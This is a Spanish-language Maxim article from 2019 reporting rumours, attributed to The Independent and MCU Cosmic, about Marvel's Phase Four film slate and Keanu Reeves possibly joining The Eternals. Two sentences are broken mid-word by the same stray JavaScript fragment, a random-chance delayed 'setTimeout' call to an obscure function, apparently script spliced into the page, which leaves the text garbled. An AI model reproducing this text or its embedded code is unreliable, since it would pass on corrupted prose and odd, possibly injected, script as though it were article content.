Se filtran planes de Marvel para fase cuatro, posible papel para Keanu Reeves

    Se filtran planes de Marvel para fase cuatro, posible papel para Keanu Reeves

    Esperemos que estos rumores no sean totalmente falsos.

    Autor: Redacción Maxim 5 junio, 2019



    Marvel

     

    Rumores sobre la fase 4 de películas de Marvel

     

     

    Cosas raras se están poniendo en marcha en el Universo Marvel. Un llamado «informante privilegiado» ha filtrado información sobre lo que sigue para la compañía detrás de las películas de superhéroes más exitosas de todos los tiempos, según The Independent.

     

    Aún más interesante, una fuente, no está claro si es la misma persona, le dice a MCU Cosmic que nada menos que Keanu «John Wick» Reeves se está proyectado para un papel en The Eternals.

     


    Lionsgate

     

    En primer lugar citemos a The Independent, quien a su vez cita al misterioso conocedor «Roger Wardell», y se le considera una fuente confiable porque conocía la trama de Avengers: Endgame mucho antes de su lanzamiento:

     

    [Según] Wardell, Marvel está desarrollandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Black Widow, The Eternals, Black Panther 2, Shang-Chi, Doctor Strange 2, Nova y Guardians of the Galaxy Vol 3. Añade que hay planes para hacer nuevas de Thor, Ant-Man y la secuela de Capitana Marvel, y sugiere que incluso podría haber películas de New Avengers, Young Avengers y Dark Avengers.

     

    Wow. Si eres adicto a Marvel, estos rumores son miel pura. Si también amas a Keanu Reeves, se pone mejor.

     

    Según MCU Cosmic, Reeves «está siendo buscado para un papel en The Eternals, y las negociaciones aparentemente ya están en marcha». Sin embargo, no ha firmado oficialmente y nadie sabe qué papel podría desempeñar.

     

    The Eternals, en caso de que no lo sepas, son un conjunto de superhéroes virtualmente inmortales que, según Digital Spy, «evolucionaron a partir de los mismos ancestros genéticos que los humanos». Tienen superpoderes y mitos inspirados sobre los dioses antiguos.

     

    En cuanto a la veracidad de estos rumores, The Independent informa que probablemente aprenderemos qué tan sólidos son cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el presidente de Marvel, Kevin Feige, aparezca en San Diego Comic Con en julio de 2019.

     

    AHORA MIRA: ‘STAR WARS: GALAXY’S EDGE’ EL NUEVO PARQUE TEMÁTICO DE DISNEY

     

     

Esperemos que estos rumores no sean totalmente falsos.